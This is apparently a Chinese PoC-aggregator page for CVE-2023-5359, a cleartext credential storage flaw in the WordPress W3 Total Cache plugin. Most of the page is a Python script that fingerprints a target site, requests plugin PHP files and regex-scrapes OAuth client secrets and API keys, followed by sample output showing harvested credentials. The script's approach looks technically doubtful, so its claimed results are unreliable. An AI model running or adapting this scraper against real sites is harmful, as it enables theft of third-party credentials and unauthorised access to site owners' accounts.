关联漏洞
标题:
WordPress plugin W3 Total Cache 信息泄露漏洞
(CVE-2023-5359)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin W3 Total Cache 2.7.5版本及之前版本存在信息泄露漏洞,该漏洞源于以纯文本形式存储Google OAuth API机密信息。攻击者利用该漏洞可以获取用户帐户信息的访问权限。
描述
Targets versions ≤2.7.5 vulnerable to CVE-2023-5359
介绍
# Cleartext-Storage-vulnerability-CVE-2023-5359-in-W3-Total-Cache
Targets versions ≤2.7.5 vulnerable to CVE-2023-5359
-------------------
import requests
import re
from urllib.parse import urljoin
# Common paths where credentials are stored
CREDENTIAL_PATHS = [
"/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
"/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php",
"/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php"
]
def check_w3tc_presence(target_url):
"""Check if W3 Total Cache is installed"""
try:
response = requests.get(target_url, timeout=10)
if "wp-content/plugins/w3-total-cache" in response.text:
return True
return False
except Exception as e:
print(f"Connection error: {str(e)}")
return False
def extract_credentials(target_url):
"""Extract plaintext credentials from vulnerable files"""
credentials = {}
for path in CREDENTIAL_PATHS:
full_url = urljoin(target_url, path)
try:
response = requests.get(full_url, headers={"User-Agent": "Mozilla/5.0"})
if response.status_code == 200:
# Search for common credential patterns
matches = re.findall(
r"(client_id|client_secret|api_key|oauth_token)\s*=\s*['\"]([a-zA-Z0-9-_]+)['\"]",
response.text
)
if matches:
credentials[path] = dict(matches)
except Exception as e:
continue
return credentials
def main():
target = input("Enter target URL (e.g., https://example.com): ").strip()
if not check_w3tc_presence(target):
print("[-] W3 Total Cache not detected")
return
print("[+] W3 Total Cache detected. Checking for CVE-2023-5359...")
creds = extract_credentials(target)
if creds:
print("\n[!] Sensitive credentials found:")
for filepath, data in creds.items():
print(f"\nFile: {filepath}")
for key, value in data.items():
print(f" {key}: {value}")
else:
print("[+] No credentials found in common locations")
if __name__ == "__main__":
main()
----------------
Enter target URL (e.g., https://example.com): https://vulnerable-site.com
[+] W3 Total Cache detected. Checking for CVE-2023-5359...
[!] Sensitive credentials found:
File: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
client_id: GOxxxxxxxxxxxx78
client_secret: ABcdEFghIJklMNopQRstUVwxYZ
File: /wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
api_key: AiiiihIwJKLmnopkhdhsQRSTUVWXYZ-123456
文件快照
[4.0K] /data/pocs/58cd5d92689fe991ed7e00c8294e3a26ece6799e
└── [2.7K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。